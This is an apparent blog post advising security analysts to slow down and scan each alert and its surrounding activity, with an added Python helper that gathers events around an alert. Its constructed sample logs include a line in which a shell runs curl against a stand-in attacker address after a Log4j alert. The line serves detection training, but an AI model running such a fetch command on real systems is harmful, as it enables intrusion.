It’s Christmas morning. You wake up before everybody else, run down the stairs, and beeline to the tree. You feverishly grab the closest present and tear it open! It’s not that great, so you furiously grab the next one; that one is boring too. The next and the next, each unwrapped only so you can get to the one after it. To an observer, this is sometimes what an analyst working a queue looks like.
It’s hard being an analyst. Often you’ll have multiple tickets open for something you’re fixing, some administrative tasks, and maybe a coworker to help in between all that. It’s easy to get caught up in those other activities, and the queue can start to look like something to knock down so the other things can get done. Remember that one of the main tasks of an analyst is to be an analyst. That means looking at data and alerts, noticing trends, and identifying risks. It’s not easy, and it doesn’t get easier by doing it faster.
I want you to look at this photo below. Instead of glancing at it, I want you to take 3 minutes. Study it, identify all the objects, and determine the purpose of those objects.
How hard was that? Did you want to jump ahead to this paragraph, or even to the picture below, after only a minute, or did you find it easy? So how can one slow down? How can we fight that urge to jump to the next paragraph? I’d like to borrow a methodology from the world of meditation: the body scan. In body scan meditation, you pay close attention to your whole body and how it feels by mentally scanning from your feet to the top of your head (or in reverse) in a slow and deliberate progression.
Now let’s practice this with the next photo. Don’t worry about the time, but apply this scanning practice to the picture. Start in the top left and work your way to the right, then go down slightly and scan back to the left. Once you’ve reached the bottom, scan your way back up the picture.
Even though you weren’t watching the time, you’ve probably spent as much or even more time than you did before, and you may have seen things you wouldn’t have seen otherwise. So, we’ve looked at a few pictures, but how will this help us be better analysts? When you get an alert, instead of being a Tasmanian Devil on Christmas morning, do a “body scan” on the alert. Look at the time it fired and the name of the alert. If it references CVE-2022-23302, for example, do you know what that means? What does a successful attack look like? If you don’t know, go research it. Open the alert, read the description, look at the data that is given, and go back over it; only when you understand what you’re supposed to be looking for, THEN look at additional data to determine whether it’s a false or true positive. Look at the surrounding activity: what happened before the alert? What happened after it? Do this with every alert. It’s not easy, especially if the queue is full of low-fidelity alerts, but we’ll tackle that topic in a post you can find here.
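As an added example that is not part of the original post, here is a small Python helper that applies the “body scan” above to an alert mechanically: it takes the alert’s name and time, then pulls the events on the same host from a few minutes before and after it, so you read the surroundings instead of jumping to the next alert. The log lines, host names, addresses and the alert wording are constructed for illustration, and the function names are my own, not a tool or API from the post.

```python
"""
Added example (not from the original post): a small 'body scan' helper that
takes one alert from a stream of constructed JSON log events and reconstructs
the activity on the same host shortly before and after the alert fired.
All event data below is constructed for illustration; it is not real telemetry.
"""
import json
from datetime import datetime, timedelta

# Constructed sample events, one JSON object per line, as a SIEM export might look.
SAMPLE_LOGS = """
{"ts": "2022-03-01T09:58:10Z", "host": "app01", "event": "process_start", "detail": "java -jar app.jar"}
{"ts": "2022-03-01T10:00:02Z", "host": "app01", "event": "inbound_conn", "detail": "203.0.113.7:51234 -> 443"}
{"ts": "2022-03-01T10:00:05Z", "host": "app01", "event": "alert", "detail": "Log4j 1.x JMSSink deserialization attempt (CVE-2022-23302)"}
{"ts": "2022-03-01T10:00:09Z", "host": "app01", "event": "outbound_conn", "detail": "app01 -> 198.51.100.5:1389"}
{"ts": "2022-03-01T10:00:11Z", "host": "app01", "event": "process_start", "detail": "/bin/sh -c curl http://198.51.100.5/x"}
{"ts": "2022-03-01T10:01:40Z", "host": "db02", "event": "logon", "detail": "svc_backup"}
{"ts": "2022-03-01T10:14:00Z", "host": "app01", "event": "process_start", "detail": "cron: logrotate"}
"""


def parse_events(text):
    """Parse newline-delimited JSON events and return them sorted by timestamp."""
    events = []
    for line in text.strip().splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(rec)
    return sorted(events, key=lambda r: r["ts"])


def context_window(events, alert, before=timedelta(minutes=5), after=timedelta(minutes=5)):
    """Return (prior, later): same-host events inside the window around the alert."""
    start, end = alert["ts"] - before, alert["ts"] + after
    same_host = [
        e for e in events
        if e["host"] == alert["host"] and start <= e["ts"] <= end and e is not alert
    ]
    prior = [e for e in same_host if e["ts"] <= alert["ts"]]
    later = [e for e in same_host if e["ts"] > alert["ts"]]
    return prior, later


def body_scan(events):
    """Walk every alert deliberately: its name, its time, then what surrounded it."""
    report = []
    for alert in (e for e in events if e["event"] == "alert"):
        prior, later = context_window(events, alert)
        fmt = lambda e: f"{e['ts'].strftime('%H:%M:%S')} {e['event']}: {e['detail']}"
        report.append({
            "alert": alert["detail"],
            "fired_at": alert["ts"].isoformat(),
            "host": alert["host"],
            "before": [fmt(e) for e in prior],   # what led up to the alert
            "after": [fmt(e) for e in later],    # what the host did next
        })
    return report


if __name__ == "__main__":
    for entry in body_scan(parse_events(SAMPLE_LOGS)):
        print(f"ALERT  {entry['fired_at']}  {entry['host']}  {entry['alert']}")
        print("  before:")
        for line in entry["before"]:
            print("    " + line)
        print("  after:")
        for line in entry["after"]:
            print("    " + line)
```

In the constructed data the alert on its own is just a name and a timestamp; it is the outbound connection to port 1389 and the shell spawning `curl` a few seconds later that tell you whether you are looking at a scanner’s noise or a successful attack. Widen the window (the `before` and `after` arguments) when the alert is about something slow, such as credential misuse, and narrow it for exploitation attempts.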
Being an analyst isn’t easy, even though it’s deemed an entry-level job in the security field. It’s far from that if you want to be good at it. The first step to being a better analyst is to slow down and observe everything. Slowing down helps direct your investigation and keeps you out of fruitless rabbit holes. Body scan your alerts for a day and see if you start noticing anything different. You’ll be surprised how much you skimmed over before.